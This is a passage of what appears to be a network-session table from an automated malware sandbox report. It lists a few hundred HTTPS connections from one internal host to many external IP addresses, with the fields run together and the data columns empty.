                                            22338192.168.2.2342632176.187.104.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22339192.168.2.235477436.13.123.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22340192.168.2.234730627.195.228.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22341192.168.2.23417548.141.18.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22342192.168.2.2345938192.46.78.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22343192.168.2.2339896160.223.147.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22344192.168.2.233307661.232.31.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22345192.168.2.2355740142.171.251.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22346192.168.2.2345316220.249.34.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22347192.168.2.233342039.32.145.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22348192.168.2.235645865.221.255.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22349192.168.2.234626068.228.195.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22350192.168.2.234352650.154.216.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22351192.168.2.2349626194.1.144.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22352192.168.2.2352050102.47.56.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22353192.168.2.2338882200.110.190.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22354192.168.2.2345650109.8.226.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22355192.168.2.234205425.26.253.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22356192.168.2.2341916170.26.237.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22357192.168.2.234729645.111.27.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22358192.168.2.235550042.205.120.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22359192.168.2.2338508210.197.170.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22360192.168.2.2336588186.230.0.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22361192.168.2.234269260.41.98.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22362192.168.2.2336516137.5.181.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22363192.168.2.2334082184.179.140.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22364192.168.2.2350064168.41.111.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22365192.168.2.233714452.229.239.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22366192.168.2.235356079.54.142.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22367192.168.2.234441677.156.220.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22368192.168.2.234228448.103.125.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22369192.168.2.2337146184.195.135.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22370192.168.2.233317840.16.95.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22371192.168.2.23488949.174.55.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22372192.168.2.2340962213.214.92.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22373192.168.2.2339754198.84.76.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22374192.168.2.2340800190.96.93.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22375192.168.2.235327297.38.197.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22376192.168.2.235713697.40.143.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22377192.168.2.2343376208.33.191.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22378192.168.2.2337846139.188.191.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22379192.168.2.234507659.190.239.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22380192.168.2.2337866113.180.98.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22381192.168.2.234447850.81.32.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22382192.168.2.2351536118.99.67.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22383192.168.2.2340358134.113.108.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22384192.168.2.233886848.184.65.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22385192.168.2.2344924136.101.77.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22386192.168.2.2335034185.154.178.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22387192.168.2.235026867.92.19.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22388192.168.2.234929285.178.58.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22389192.168.2.233494084.18.209.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22390192.168.2.2355878110.199.95.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22391192.168.2.236022888.89.160.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22392192.168.2.2338638130.50.232.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22393192.168.2.2346790119.74.131.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22394192.168.2.233380074.170.77.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22395192.168.2.2357478184.253.8.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22396192.168.2.2351188183.162.159.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22397192.168.2.235547432.48.100.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22398192.168.2.235654877.141.202.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22399192.168.2.2354084212.196.152.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22400192.168.2.233820827.231.139.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22401192.168.2.234677424.106.88.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22402192.168.2.2347600209.228.111.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22403192.168.2.236039866.13.155.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22404192.168.2.2334684147.113.225.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22405192.168.2.2345408152.244.175.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22406192.168.2.233510637.101.76.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22407192.168.2.233701881.75.255.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22408192.168.2.2356714205.86.38.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22409192.168.2.2350128132.244.152.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22410192.168.2.2359878169.228.239.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22411192.168.2.233939620.111.195.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22412192.168.2.2339866137.231.242.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22413192.168.2.2343544134.7.176.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22414192.168.2.23546809.230.235.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22415192.168.2.235312258.29.19.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22416192.168.2.234058081.155.189.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22417192.168.2.2352954179.114.77.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22418192.168.2.2352052181.111.149.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22419192.168.2.2347096201.91.200.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22420192.168.2.235919266.17.222.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22421192.168.2.2346928110.29.71.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22422192.168.2.2351668112.0.18.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22423192.168.2.234454227.245.93.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22424192.168.2.234038499.231.61.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22425192.168.2.233611875.135.145.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22426192.168.2.233487039.170.233.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22427192.168.2.235808446.123.236.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22428192.168.2.234562647.108.178.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22429192.168.2.2342490137.38.85.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22430192.168.2.2357148144.119.244.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22431192.168.2.23551901.39.40.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22432192.168.2.2335288142.237.246.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22433192.168.2.2349614173.66.200.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22434192.168.2.2354438163.138.196.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22435192.168.2.23354285.211.246.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22436192.168.2.2359368192.123.189.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22437192.168.2.2359444116.161.161.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22438192.168.2.2351126148.76.160.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22439192.168.2.234803645.208.91.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22440192.168.2.2351784203.100.145.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22441192.168.2.2341852131.41.246.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22442192.168.2.234091823.98.186.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22443192.168.2.235218897.102.27.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22444192.168.2.2333096161.176.76.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22445192.168.2.235393432.15.245.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22446192.168.2.2351332146.156.185.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22447192.168.2.233551098.39.97.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22448192.168.2.23459744.94.62.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22449192.168.2.2346406130.29.193.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22450192.168.2.2357454175.122.3.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22451192.168.2.2346840141.65.125.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22452192.168.2.233923280.23.131.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22453192.168.2.235955471.9.108.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22454192.168.2.2335476147.151.14.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22455192.168.2.2359412192.173.106.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22456192.168.2.2334804129.152.109.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22457192.168.2.2343616122.201.16.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22458192.168.2.23593181.255.52.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22459192.168.2.2336180106.175.224.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22460192.168.2.235520082.175.133.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22461192.168.2.234006659.124.243.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22462192.168.2.2334144111.9.17.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22463192.168.2.2333964149.141.81.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22464192.168.2.233684086.27.212.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22465192.168.2.2351290165.68.230.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22466192.168.2.23471325.152.20.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22467192.168.2.235477276.200.76.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22468192.168.2.233698671.97.226.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22469192.168.2.2342714108.71.132.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22470192.168.2.2354204167.139.57.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22471192.168.2.2353414142.207.11.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22472192.168.2.2346168157.135.138.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22473192.168.2.2332840203.118.237.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22474192.168.2.234576047.198.106.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22475192.168.2.234321262.138.222.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22476192.168.2.2352154209.31.60.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22477192.168.2.2349698184.243.3.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22478192.168.2.234163483.5.140.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22479192.168.2.2333042198.198.94.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22480192.168.2.2346574156.209.24.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22481192.168.2.233375045.5.188.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22482192.168.2.2353382162.177.4.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22483192.168.2.234142474.50.17.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22484192.168.2.235645886.39.7.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22485192.168.2.2346460132.95.96.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22486192.168.2.234047413.182.59.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22487192.168.2.236016696.26.163.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22488192.168.2.2354760177.235.226.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22489192.168.2.234256650.167.109.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22490192.168.2.235598278.23.15.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22491192.168.2.234078662.254.102.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22492192.168.2.23503289.58.8.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22493192.168.2.2359460171.105.210.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22494192.168.2.235176832.199.163.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22495192.168.2.233797043.242.128.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22496192.168.2.2343824137.11.93.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22497192.168.2.2350686133.133.187.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22498192.168.2.2342184218.99.128.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22499192.168.2.234699848.61.179.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22500192.168.2.2355614184.200.1.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22501192.168.2.235943495.89.86.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22502192.168.2.233997840.186.222.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22503192.168.2.2348426142.150.222.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22504192.168.2.2350088217.37.39.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22505192.168.2.2357086116.84.136.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22506192.168.2.2342054179.114.56.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22507192.168.2.234867842.203.71.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22508192.168.2.2342510139.38.125.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22509192.168.2.23488089.185.174.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22510192.168.2.2348548168.77.182.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22511192.168.2.233431469.35.139.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22512192.168.2.2349150118.242.147.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22513192.168.2.233697680.103.120.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22514192.168.2.2345646219.41.110.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22515192.168.2.2341414109.112.30.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22516192.168.2.233419247.78.73.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22517192.168.2.235353636.179.205.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22518192.168.2.235032692.39.239.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22519192.168.2.233741463.94.73.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22520192.168.2.2348504212.202.20.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22521192.168.2.234626488.16.218.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22522192.168.2.2360564121.61.124.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22523192.168.2.2349488216.65.243.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22524192.168.2.234061662.11.90.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22525192.168.2.233837818.62.207.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22526192.168.2.2343196143.87.228.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22527192.168.2.2333510200.187.225.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22528192.168.2.234526066.240.129.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22529192.168.2.235722281.73.91.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22530192.168.2.235007887.165.91.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22531192.168.2.234641838.23.93.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22532192.168.2.235561854.191.185.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22533192.168.2.2341396163.209.23.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22534192.168.2.235597447.21.24.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22535192.168.2.233872460.241.37.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22536192.168.2.233469277.111.222.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22537192.168.2.235518090.14.61.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22538192.168.2.2344758112.108.203.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22539192.168.2.2343048191.139.159.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22540192.168.2.233282057.113.110.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22541192.168.2.234793283.62.144.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22542192.168.2.233561078.253.162.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22543192.168.2.234906827.28.201.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22544192.168.2.2351886178.66.30.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22545192.168.2.235355669.95.44.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22546192.168.2.233991439.103.225.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22547192.168.2.233915471.178.192.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22548192.168.2.234303220.42.184.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22549192.168.2.2353846221.87.155.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22550192.168.2.235363665.199.7.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22551192.168.2.2338188131.65.150.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22552192.168.2.2334974219.81.113.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22553192.168.2.234956682.123.179.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22554192.168.2.2350024109.155.210.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22555192.168.2.2356836168.197.184.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22556192.168.2.234293419.187.151.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22557192.168.2.235405878.238.126.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22558192.168.2.235321839.241.192.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22559192.168.2.2350248212.112.247.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
